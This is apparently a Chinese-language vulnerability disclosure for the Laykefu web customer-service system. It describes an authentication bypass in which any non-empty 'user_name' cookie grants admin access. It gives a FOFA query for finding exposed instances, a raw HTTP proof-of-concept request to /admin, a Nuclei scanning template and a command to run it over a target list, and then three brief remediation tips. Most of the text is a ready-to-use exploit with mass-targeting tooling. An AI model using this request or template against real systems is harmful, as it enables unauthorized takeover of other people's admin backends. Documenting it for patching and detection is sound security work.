【产品介绍】Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统，旨在帮助企业有效管理和提供优质的客户服务【漏洞介绍】请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台，恶意攻击者可利用此漏洞获得后台权限【资产测绘Query】fofa语法：icon_hash="-334624619"【产品界面】【漏洞复现】【poc】GET /admin HTTP/2Host: Cookie: user_name=1Sec-Fetch-Site: noneSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-User: ?1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Upgrade-Insecure-Requests: 1Te: trailersAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept-Encoding: gzip, deflate【Nuclei-Poc】id: Laykefu-Unauthorizedinfo: name: Laykefu Unauthorized author: admin severity: high description: description reference: - https:// tags: tagshttp: - raw: - |+ GET /admin HTTP/2 Host: {{Hostname}} Cookie: user_name=1 Sec-Fetch-Site: none Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Upgrade-Insecure-Requests: 1 Te: trailers Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept-Encoding: gzip, deflate matchers-condition: and matchers: - type: binary part: body binary: - e5aea2e69c8d - type: status status: - 200【验证】.\nuclei -l 1.txt -t 1.yaml【修复建议】1、请联系厂商进行修复
2、如非必要，禁止公网访问该系统
3、设置白名单访问